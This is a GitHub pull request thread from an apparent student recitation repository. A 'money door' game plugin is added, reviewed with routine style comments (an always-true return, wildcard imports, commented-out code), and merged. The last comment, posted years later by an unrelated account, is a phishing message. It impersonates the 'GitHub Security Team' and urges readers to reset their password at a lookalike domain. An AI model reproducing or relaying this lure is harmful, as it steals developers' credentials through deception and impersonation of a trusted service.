Money door
shrutichidam/Recitation10 pull request #2
Opened 2018-10-31 13:50 UTC by minjil

added money door plugin

2018-10-31 13:59 UTC, shrutichidam requested changes

2018-10-31 13:59 UTC, shrutichidam commented on src/main/java/edu/cmu/cs/cs214/rec10/plugin/MoneyDoorPlugin.java
> +        return isGameOver() || !isGameOver();
This will always return true

2018-10-31 13:59 UTC, shrutichidam commented on src/main/java/edu/cmu/cs/cs214/rec10/plugin/MoneyDoorPlugin.java
> +import java.util.*;
avoid * imports

2018-10-31 13:59 UTC, shrutichidam commented on src/main/java/edu/cmu/cs/cs214/rec10/plugin/MoneyDoorPlugin.java
> +//System.out.println("game is over");
Commented-out code is unneccessary

2018-10-31 13:59 UTC, shrutichidam commented on src/main/java/edu/cmu/cs/cs214/rec10/plugin/MoneyDoorPlugin.java
> +    public boolean isGameOver() {
this and other methods don't need to be public

2018-10-31 14:02 UTC, shrutichidam approved these changes

2018-10-31 14:03 UTC, merged

2024-05-26 20:59 UTC, GtdsIndonesia commented
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**